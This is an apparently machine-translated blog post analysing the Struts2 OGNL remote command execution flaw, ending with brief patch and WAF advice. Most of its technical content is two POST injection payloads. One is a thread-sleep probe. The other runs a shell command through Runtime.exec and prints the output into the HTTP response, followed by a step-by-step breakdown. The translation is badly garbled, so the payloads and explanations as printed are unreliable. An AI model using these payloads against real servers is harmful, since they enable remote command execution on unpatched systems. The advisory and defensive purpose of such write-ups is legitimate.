Struts2 Remote Command Execution Vulnerability Analysis and Prevention

Struts 2 is a new framework that combines struts and WebWork technologies. The new architecture of Struts 2 is significantly different from that of Struts 1. Struts 2 uses WebWork as the core and the interceptor mechanism to process users' requests. This design also enables the business logic controller to completely remove from the Servlet API, therefore, Struts 2 can be understood as a WebWork update product.
 
Recently, a remote command execution vulnerability exists in Struts2. The vulnerability exploitation tools of various versions make CNVD very painful. The following shows how livers greatly analyzes this vulnerability.
 
Submitted in POST mode bypasses partial filtering of input parameters.
 
('\ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) (' \ 43 context [\ 'xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & ('\ 43c') ('\ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET') (c) & (d) ('@ java. lang. thread @ sleep (8000) ') (d ))
Current thread sleep 8 S
Command Execution is mainly performed through the context built-in static functions of the ognl object.
For example, @runtime@getruntime(cmd.exe c
@ Class @ method static access method
The ognl Statement of xwork must be executed. The variable must contain #, which was previously bypassed by \ 0023 (hexadecimal, the official patch shields this but can be bypassed by \ 43 (octal.
 
Interactive shell. www.2cto.com
('\ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) (' \ 43 context [\ 'xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & ('\ 43c') ('\ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET') (c) & (g) ('\ 43mycmd \ 75 \ 'ls \ 40 \ u002dl \ '') (d) & (h) (' \ 43myret \ 75@java.lang.runtime@getruntime(cmd.exe c (\ 43 mycmd) ') (d) & (I) (' \ 43mydat \ 75new \ 40java. io. dataInputStream (\ 43myret. getInputStream () ') (d) & (j) (' \ 43myres \ 75new \ 40 byte [51020] ') (d) & (k) ('\ 43mydat. readFully (\ 43 myres) ') (d) & (l) (' \ 43mystr \ 75new \ 40java. lang. string (\ 43 myres) ') (d) & (m) (' \ 43myout \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (n) ('\ 43myout. getWriter (). println (\ 43 mystr) ') (d ))
 
\ 75 (= octal) \ 40 (octal space) the parameters executed in the ongl statement cannot contain spaces. Including others
The old version of the regular expression is ^ # =: it is not allowed. \ 40 is used for blocking.
 
In this way, the above is
1. Set context denyMethodExecution = false to run the method.
2. excludeProperties = @ java. util. Collections @ EMPTY_SET (@ class @ call static variables)
Set the external Interceptor to null
3. mycmd = "ls-l" defines the variables for executing commands.
4.myret=@java.lang.runtime@getruntime(cmd.exe c (\ 43 mycmd) ') (call the static method to execute our variables)
5. mydat = new java. io. DataInputStream (\ 43myret. getInputStream () ') Get the input stream (post)
6. myres = new data [51020]; mydat. readfully (myres); read the input stream
(5, 6 to convert the input stream type)
7. mystr = new java. lang. String (# myres); Define and assign values to the input stream
8. myout = org. apache. struts2.ServletActionContext @ getResponse (); get repsonse data
9. myout. getWriter (). println (# mystr); print the response data to the screen.
 

 
Struts2 vulnerability repair solution:
 
Download the latest version 2.3.4: http://struts.apache.org/download.cgi#struts234
 
Or modify the ongl processing logic in the corresponding jar, and then compile and package to replace the old file.
 
For waf and the like, only letters and numbers are reserved for security points. For other items deleted, thank you for your great suggestions on fixing them.

From shoushou's Blog